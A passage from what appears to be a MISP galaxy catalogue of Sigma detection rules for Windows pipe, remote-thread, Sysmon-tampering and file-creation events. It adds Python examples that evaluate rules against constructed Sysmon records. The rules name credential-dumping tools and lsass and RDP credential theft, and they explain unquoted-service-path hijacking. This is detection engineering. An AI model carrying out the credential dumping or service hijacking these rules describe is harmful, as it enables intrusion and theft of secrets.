| filename | pipe_created_powershell_alternate_host_pipe.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
PsExec Tool Execution From Suspicious Locations - PipeName
Detects PsExec default pipe creation where the executed image is located in a suspicious location, which could indicate that the tool is being used in an attack.
Internal MISP references
UUID 41504465-5e3a-4a5b-a5b4-2a0baadd4463 which can be used as unique global reference for PsExec Tool Execution From Suspicious Locations - PipeName in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-04 |
| falsepositive | ['Rare legitimate use of psexec from the locations mentioned above. This will require initial tuning based on your environment.'] |
| filename | pipe_created_sysinternals_psexec_default_pipe_susp_location.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1569.002', 'attack.s0029'] |
WMI Event Consumer Created Named Pipe
Detects the WMI Event Consumer service scrcons.exe creating a named pipe
Internal MISP references
UUID 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb which can be used as unique global reference for WMI Event Consumer Created Named Pipe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-09-01 |
| falsepositive | ['Unknown'] |
| filename | pipe_created_scrcons_wmi_consumer_namedpipe.yml |
| level | medium |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.t1047', 'attack.execution'] |
HackTool - Credential Dumping Tools Named Pipe Created
Detects execution of well-known credential dumping tools via the specific named pipes they create.
Internal MISP references
UUID 961d0ba2-3eea-4303-a930-2cf78bbfcc5e which can be used as unique global reference for HackTool - Credential Dumping Tools Named Pipe Created in MISP communities and other software using the MISP galaxy
External references
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - webarchive
- https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Teymur Kheirkhabarov, oscd.community |
| creation_date | 2019-11-01 |
| falsepositive | ['Legitimate Administrator using tool for password recovery'] |
| filename | pipe_created_hktl_generic_cred_dump_tools_pipes.yml |
| level | critical |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.005'] |
New PowerShell Instance Created
Detects the execution of PowerShell via the creation of a named pipe starting with PSHost
Internal MISP references
UUID ac7102b4-9e1e-4802-9b4f-17c5524c015c which can be used as unique global reference for New PowerShell Instance Created in MISP communities and other software using the MISP galaxy
External references
- https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html - webarchive
- https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| creation_date | 2019-09-12 |
| falsepositive | ['Likely'] |
| filename | pipe_created_powershell_execution_pipe.yml |
| level | informational |
| logsource.category | pipe_created |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
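The two PowerShell pipe rules above (Alternate PowerShell Hosts Pipe and New PowerShell Instance Created) both key on Sysmon Event ID 17 (PipeCreated) records whose PipeName starts with \PSHost; they differ only in whether the creating Image is an expected PowerShell host. The following is an added example, not code from the Sigma project or the MISP galaxy, that applies that logic to a handful of constructed Event ID 17/18 records. The sample events, the allow-list of expected host images, and the assumed layout of the PSHost pipe name (\PSHost.<start-time>.<pid>.<appdomain>.<process>) are assumptions, not the published rules' exact filter lists.

```python
"""Added example (not from the Sigma project or the MISP galaxy): applies the
PSHost pipe logic described above to constructed Sysmon pipe events."""
from dataclasses import dataclass
from typing import Optional

# Constructed sample events (not real telemetry). Sysmon Event ID 17 is
# PipeCreated and carries the PipeName plus the Image of the creating process;
# Event ID 18 (PipeConnected) is included to show it is deliberately ignored.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PipeName": r"\PSHost.133600000000000000.4120.DefaultAppDomain.powershell"},
    {"EventID": 17, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "PipeName": r"\PSHost.133600000000000001.5204.DefaultAppDomain.pwsh"},
    {"EventID": 17, "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "PipeName": r"\PSHost.133600000000000002.6611.DefaultAppDomain.updater"},
    {"EventID": 18, "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "PipeName": r"\PSHost.133600000000000002.6611.DefaultAppDomain.updater"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\ntsvcs"},
]

# Assumed allow-list of images that legitimately host the PowerShell engine.
# The published rule's own filter list may differ; tune it to your estate.
EXPECTED_PS_HOSTS = ("\\powershell.exe", "\\powershell_ise.exe", "\\pwsh.exe")


@dataclass(frozen=True)
class Alert:
    rule: str
    level: str
    image: str
    pipe: str
    host_pid: Optional[int]


def parse_pshost_pipe(pipe_name: str) -> Optional[dict]:
    """Split '\\PSHost.<start-time>.<pid>.<appdomain>.<process>' (assumed
    layout of the PowerShell host pipe name) into its pid and process name."""
    parts = pipe_name.lstrip("\\").split(".")
    if len(parts) < 5 or parts[0] != "PSHost" or not parts[2].isdigit():
        return None
    return {"pid": int(parts[2]), "process": ".".join(parts[4:])}


def new_powershell_instance(event: dict) -> bool:
    """'New PowerShell Instance Created': any PipeCreated event whose pipe
    name starts with \\PSHost. Informational, since every host does this."""
    return event["EventID"] == 17 and event["PipeName"].startswith("\\PSHost")


def alternate_powershell_host(event: dict) -> bool:
    """'Alternate PowerShell Hosts Pipe': a PSHost pipe created by an image
    that is not one of the expected PowerShell executables."""
    if not new_powershell_instance(event):
        return False
    return not event["Image"].lower().endswith(EXPECTED_PS_HOSTS)


def evaluate(events: list) -> list:
    """Run both rules; the more specific (alternate host) one wins."""
    alerts = []
    for ev in events:
        if alternate_powershell_host(ev):
            rule, level = "Alternate PowerShell Hosts Pipe", "medium"
        elif new_powershell_instance(ev):
            rule, level = "New PowerShell Instance Created", "informational"
        else:
            continue
        parsed = parse_pshost_pipe(ev["PipeName"]) or {}
        alerts.append(Alert(rule, level, ev["Image"], ev["PipeName"], parsed.get("pid")))
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.level}] {a.rule}: {a.image} (pid {a.host_pid}) -> {a.pipe}")
```

The allow-list is the whole rule: anything that loads System.Management.Automation (a custom C# host, a trojanised binary) creates a PSHost pipe without ever spawning powershell.exe, so the informational rule gives you inventory of every PowerShell host and the medium-severity rule gives you the ones you did not expect.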
Sysmon Configuration Modification
Detects when an attacker tries to hide from Sysmon by disabling or stopping it
Internal MISP references
UUID 1f2b5353-573f-4880-8e33-7d04dcf97744 which can be used as unique global reference for Sysmon Configuration Modification in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_status.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-06-04 |
| falsepositive | ['Legitimate administrative action'] |
| filename | sysmon_config_modification_status.yml |
| level | high |
| logsource.category | sysmon_status |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564'] |
Sysmon Configuration Change
Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or of someone trying to manipulate the configuration.
Internal MISP references
UUID 8ac03a65-6c84-4116-acad-dc1558ff7a77 which can be used as unique global reference for Sysmon Configuration Change in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-12 |
| falsepositive | ['Legitimate administrative action'] |
| filename | sysmon_config_modification.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Sysmon Blocked File Shredding
Triggers on any Sysmon "FileBlockShredding" event, which indicates a violation of the configured shredding policy.
Internal MISP references
UUID c3e5c1b1-45e9-4632-b242-27939c170239 which can be used as unique global reference for Sysmon Blocked File Shredding in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-07-20 |
| falsepositive | ['Unlikely'] |
| filename | sysmon_file_block_shredding.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Sysmon Configuration Error
Detects, based on Sysmon error messages, an adversary trying to hide its actions from Sysmon logging.
Internal MISP references
UUID 815cd91b-7dbc-4247-841a-d7dd1392b0a8 which can be used as unique global reference for Sysmon Configuration Error in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/sysmon/sysmon_config_modification_error.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-06-04 |
| falsepositive | ['Legitimate administrative action'] |
| filename | sysmon_config_modification_error.yml |
| level | high |
| logsource.category | sysmon_error |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564'] |
Sysmon File Executable Creation Detected
Triggers on any Sysmon "FileExecutableDetected" event, which fires every time a PE file matching the monitored configuration is created.
Internal MISP references
UUID 693a44e9-7f26-4cb6-b787-214867672d3a which can be used as unique global reference for Sysmon File Executable Creation Detected in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2023-07-20 |
| falsepositive | ['Unlikely'] |
| filename | sysmon_file_executable_detected.yml |
| level | medium |
| logsource.category | No established category |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Sysmon Blocked Executable
Triggers on any Sysmon "FileBlockExecutable" event, which indicates a violation of the configured block policy
Internal MISP references
UUID 23b71bc5-953e-4971-be4c-c896cda73fc2 which can be used as unique global reference for Sysmon Blocked Executable in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-16 |
| falsepositive | ['Unlikely'] |
| filename | sysmon_file_block_executable.yml |
| level | high |
| logsource.category | No established category |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Remote Thread Creation By Uncommon Source Image
Detects uncommon processes creating remote threads.
Internal MISP references
UUID 66d31e5f-52d6-40a4-9615-002d3789a119 which can be used as unique global reference for Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io - webarchive
- Personal research, statistical analysis
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Perez Diego (@darkquassar), oscd.community |
| creation_date | 2019-10-27 |
| falsepositive | ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.'] |
| filename | create_remote_thread_win_susp_uncommon_source_image.yml |
| level | medium |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055'] |
Remote Thread Created In KeePass.EXE
Detects remote thread creation in "KeePass.exe", which could indicate password dumping activity.
Internal MISP references
UUID 77564cc2-7382-438b-a7f6-395c2ae53b9a which can be used as unique global reference for Remote Thread Created In KeePass.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timon Hackenjos |
| creation_date | 2022-04-22 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_keepass.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.005'] |
Remote Thread Creation Via PowerShell In Uncommon Target
Detects the creation of a remote thread from a PowerShell process in an uncommon target process.
Internal MISP references
UUID 99b97608-3e21-4bfe-8217-2a127c396a0e which can be used as unique global reference for Remote Thread Creation Via PowerShell In Uncommon Target in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-06-25 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_powershell_susp_targets.yml |
| level | medium |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218.011', 'attack.t1059.001'] |
HackTool - CACTUSTORCH Remote Thread Creation
Detects remote thread creation from CACTUSTORCH as described in references.
Internal MISP references
UUID 2e4e488a-6164-4811-9ea1-f960c7359c40 which can be used as unique global reference for HackTool - CACTUSTORCH Remote Thread Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @SBousseaden (detection), Thomas Patzke (rule) |
| creation_date | 2019-02-01 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_hktl_cactustorch.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.execution', 'attack.t1055.012', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218.005'] |
HackTool - Potential CobaltStrike Process Injection
Detects potential remote thread creation with characteristics typical of Cobalt Strike beacons.
Internal MISP references
UUID 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 which can be used as unique global reference for HackTool - Potential CobaltStrike Process Injection in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f - webarchive
- https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community |
| creation_date | 2018-11-30 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_hktl_cobaltstrike.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055.001'] |
Password Dumper Remote Thread in LSASS
Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.
Internal MISP references
UUID f239b326-2f41-4d6b-9dfa-c846a60ef505 which can be used as unique global reference for Password Dumper Remote Thread in LSASS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Thomas Patzke |
| creation_date | 2017-02-19 |
| falsepositive | ['Antivirus products'] |
| filename | create_remote_thread_win_susp_password_dumper_lsass.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.s0005', 'attack.t1003.001'] |
Remote Thread Creation In Mstsc.Exe From Suspicious Location
Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.
Internal MISP references
UUID c0aac16a-b1e7-4330-bab0-3c27bb4987c7 which can be used as unique global reference for Remote Thread Creation In Mstsc.Exe From Suspicious Location in MISP communities and other software using the MISP galaxy
External references
- https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-28 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_mstsc_susp_location.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.credential-access'] |
Remote Thread Creation Ttdinject.exe Proxy
Detects remote thread creation by Ttdinject.exe used as an execution proxy.
Internal MISP references
UUID c15e99a3-c474-48ab-b9a7-84549a7a9d16 which can be used as unique global reference for Remote Thread Creation Ttdinject.exe Proxy in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-05-16 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_ttdinjec.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
Potential Credential Dumping Attempt Via PowerShell Remote Thread
Detects remote thread creation by PowerShell processes into "lsass.exe"
Internal MISP references
UUID fb656378-f909-47c1-8747-278bf09f4f4f which can be used as unique global reference for Potential Credential Dumping Attempt Via PowerShell Remote Thread in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | oscd.community, Natalia Shornikova |
| creation_date | 2020-10-06 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_powershell_lsass.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
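Both Password Dumper Remote Thread in LSASS and Potential Credential Dumping Attempt Via PowerShell Remote Thread above match Sysmon Event ID 8 (CreateRemoteThread) records with lsass.exe as the TargetImage, and the first rule's own note that "a single execution can lead to hundreds of events" is the practical problem: without aggregation one dump floods the queue. The following is an added example, not code from the Sigma project or the MISP galaxy, that classifies constructed Event ID 8 records against both rules, applies the stated false positive (antivirus products) as an allow-list, and collapses the burst into one alert per source process. The sample events, the AV allow-list entry, and the PowerShell image names are assumptions.

```python
"""Added example (not from the Sigma project or the MISP galaxy): evaluates
the two lsass.exe remote-thread rules above over constructed Sysmon Event ID 8
records and aggregates the burst a single dump produces."""
from collections import defaultdict
from typing import Optional

LSASS = "\\lsass.exe"
POWERSHELL_IMAGES = ("\\powershell.exe", "\\powershell_ise.exe", "\\pwsh.exe")
# Assumed allow-list for the rule's stated false positive (antivirus products).
AV_ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}


def _burst(source: str, pid: int, n: int, start: int = 0x7FF6_1000_0000) -> list:
    """Constructed helper: one dump attempt yields many Event ID 8 records,
    each with a different thread start address inside lsass."""
    return [{"EventID": 8, "SourceImage": source, "SourceProcessId": pid,
             "TargetImage": r"C:\Windows\System32\lsass.exe",
             "StartAddress": hex(start + 0x1000 * i)} for i in range(n)]


# Constructed sample telemetry: a dumper, PowerShell, an AV engine, and an
# unrelated remote thread that never touches lsass.
SAMPLE_EVENTS = (
    _burst(r"C:\Users\bob\Downloads\dumper.exe", 7712, 120)
    + _burst(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 8120, 40)
    + _burst(r"C:\Program Files\Windows Defender\MsMpEng.exe", 2604, 5)
    + [{"EventID": 8, "SourceImage": r"C:\Windows\System32\svchost.exe",
        "SourceProcessId": 900, "TargetImage": r"C:\Windows\explorer.exe",
        "StartAddress": "0x7ff600001000"}]
)


def classify(event: dict) -> Optional[str]:
    """Return the rule name an Event ID 8 record matches, or None."""
    if event["EventID"] != 8 or not event["TargetImage"].lower().endswith(LSASS):
        return None
    src = event["SourceImage"].lower()
    if src in AV_ALLOWLIST:
        return None
    if src.endswith(POWERSHELL_IMAGES):
        return "Potential Credential Dumping Attempt Via PowerShell Remote Thread"
    return "Password Dumper Remote Thread in LSASS"


def aggregate(events: list) -> list:
    """One alert per (rule, source image, pid) carrying the event count and
    the number of distinct thread start addresses, so 120 records become one
    alert whose counts still tell the analyst how noisy the source was."""
    buckets = defaultdict(lambda: {"count": 0, "starts": set()})
    for ev in events:
        rule = classify(ev)
        if rule is None:
            continue
        bucket = buckets[(rule, ev["SourceImage"], ev["SourceProcessId"])]
        bucket["count"] += 1
        bucket["starts"].add(ev["StartAddress"])
    return [{"rule": rule, "source_image": image, "pid": pid,
             "events": v["count"], "distinct_starts": len(v["starts"])}
            for (rule, image, pid), v in
            sorted(buckets.items(), key=lambda kv: -kv[1]["count"])]


if __name__ == "__main__":
    for alert in aggregate(SAMPLE_EVENTS):
        print(alert)
```

Keying the allow-list on the full lowercased path rather than the file name matters here: a dumper copied to a user-writable directory and renamed MsMpEng.exe should still alert.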
Remote Thread Creation In Uncommon Target Image
Detects uncommon target processes for remote thread creation
Internal MISP references
UUID a1a144b7-5c9b-4853-a559-2172be8d4a03 which can be used as unique global reference for Remote Thread Creation In Uncommon Target Image in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-16 |
| falsepositive | ['Unknown'] |
| filename | create_remote_thread_win_susp_uncommon_target_image.yml |
| level | medium |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055.003'] |
Rare Remote Thread Creation By Uncommon Source Image
Detects uncommon processes creating remote threads.
Internal MISP references
UUID 02d1d718-dd13-41af-989d-ea85c7fab93f which can be used as unique global reference for Rare Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io - webarchive
- Personal research, statistical analysis
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Perez Diego (@darkquassar), oscd.community |
| creation_date | 2019-10-27 |
| falsepositive | ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.'] |
| filename | create_remote_thread_win_susp_relevant_source_image.yml |
| level | high |
| logsource.category | create_remote_thread |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055'] |
Suspicious Deno File Written from Remote Source
Detects Deno writing a file fetched via a direct HTTP(S) call to the AppData folder, or bringing its own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through Deno.
Internal MISP references
UUID 6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e which can be used as unique global reference for Suspicious Deno File Written from Remote Source in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Josh Nickels, Michael Taggart |
| creation_date | 2025-05-22 |
| falsepositive | ['Legitimate usage of deno to request a file or bring a DLL to a host'] |
| filename | file_event_win_creation_deno.yml |
| level | low |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1204', 'attack.t1059.007', 'attack.command-and-control', 'attack.t1105'] |
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
Internal MISP references
UUID 847def9e-924d-4e90-b7c4-5f581395a2b4 which can be used as unique global reference for HackTool - QuarksPwDump Dump File in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-02-10 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_hktl_quarkspw_filedump.yml |
| level | critical |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.002'] |
LiveKD Driver Creation By Uncommon Process
Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
Internal MISP references
UUID 059c5af9-5131-4d8d-92b2-de4ad6146712 which can be used as unique global reference for LiveKD Driver Creation By Uncommon Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-16 |
| falsepositive | ['Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter'] |
| filename | file_event_win_sysinternals_livekd_driver_susp_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation'] |
New Outlook Macro Created
Detects the creation of a macro file for Outlook.
Internal MISP references
UUID 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 which can be used as unique global reference for New Outlook Macro Created in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @ScoubiMtl |
| creation_date | 2021-04-05 |
| falsepositive | ['User genuinely creates a VB Macro for their email'] |
| filename | file_event_win_office_outlook_macro_creation.yml |
| level | medium |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546'] |
Suspicious Executable File Creation
Detects creation of suspicious executable file names. Some strings look for suspicious file extensions, others for file names that exploit unquoted service paths.
Internal MISP references
UUID 74babdd6-a758-4549-9632-26535279e654 which can be used as unique global reference for Suspicious Executable File Creation in MISP communities and other software using the MISP galaxy
External references
- https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae - webarchive
- https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-09-05 |
| falsepositive | ['Unknown'] |
| filename | file_event_win_susp_executable_creation.yml |
| level | high |
| logsource.category | file_event |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564'] |
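The unquoted-service-path half of Suspicious Executable File Creation above relies on how Windows resolves an unquoted command line containing spaces: CreateProcess tries each space-delimited prefix with ".exe" appended before reaching the real binary, so for C:\Program Files\Vendor Tools\agent\agent.exe it tries C:\Program.exe and C:\Program Files\Vendor.exe first. The following is an added example, not code from the Sigma project or the MISP galaxy, that derives those candidate names from a set of service ImagePath values and flags constructed Sysmon Event ID 11 (FileCreate) records that create one of them. The service definitions and file events are constructed; the generalisation to any list of services is the author's own.

```python
"""Added example (not from the Sigma project or the MISP galaxy): derives the
file names that would hijack an unquoted service path and flags constructed
Sysmon Event ID 11 (FileCreate) records that create one of them."""


def hijack_candidates(unquoted_path: str) -> list:
    """For 'C:\\Program Files\\My App\\svc.exe' return the executables Windows
    would try before the real one: 'C:\\Program.exe', 'C:\\Program Files\\My.exe'.
    A quoted path, or one without spaces, yields no candidates."""
    path = unquoted_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    parts = path.split(" ")
    # Every prefix that ends just before a space becomes '<prefix>.exe'.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def build_watchlist(service_paths: dict) -> dict:
    """Map each lowercased candidate file name to the service it would hijack."""
    watch = {}
    for service, path in service_paths.items():
        for candidate in hijack_candidates(path):
            watch[candidate.lower()] = service
    return watch


def detect(events: list, watch: dict) -> list:
    """Alert on FileCreate events whose TargetFilename is a hijack candidate."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 11:
            continue
        service = watch.get(ev["TargetFilename"].lower())
        if service:
            alerts.append({"service": service, "file": ev["TargetFilename"],
                           "image": ev["Image"]})
    return alerts


# Constructed service ImagePath values: one exploitable, one correctly
# quoted, one without spaces (the last two produce no candidates).
SERVICES = {
    "VendorAgent": r"C:\Program Files\Vendor Tools\agent\agent.exe",
    "QuotedSvc":   r'"C:\Program Files\Quoted Svc\svc.exe"',
    "NoSpaces":    r"C:\Tools\svc.exe",
}

# Constructed Sysmon Event ID 11 records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\eve\AppData\Local\Temp\build.exe",
     "TargetFilename": r"C:\Program.exe"},
    {"EventID": 11, "Image": r"C:\Users\eve\AppData\Local\Temp\build.exe",
     "TargetFilename": r"C:\Program Files\Vendor.exe"},
    {"EventID": 11, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Program Files\Vendor Tools\agent\agent.exe"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\eve\notes.txt"},
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, build_watchlist(SERVICES)):
        print(alert)
```

A generic rule can only list the usual suspects (C:\Program.exe, C:\Program Files\Common.exe and the like); feeding the detector the actual ImagePath values from the hosts' service configuration turns it into an environment-specific watchlist that also covers third-party install paths.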
Office Macro File Creation From Suspicious Process
Detects the creation of an Office macro file from a suspicious process.
Internal MISP references
UUID b1c50487-1967-4315-a026-6491686d860e which can be used as unique global reference for Office Macro File Creation From Suspicious Process in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md - webarchive
- https://learn.microsoft.com/en-us/deployoffice/compat/office-file-format-reference - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
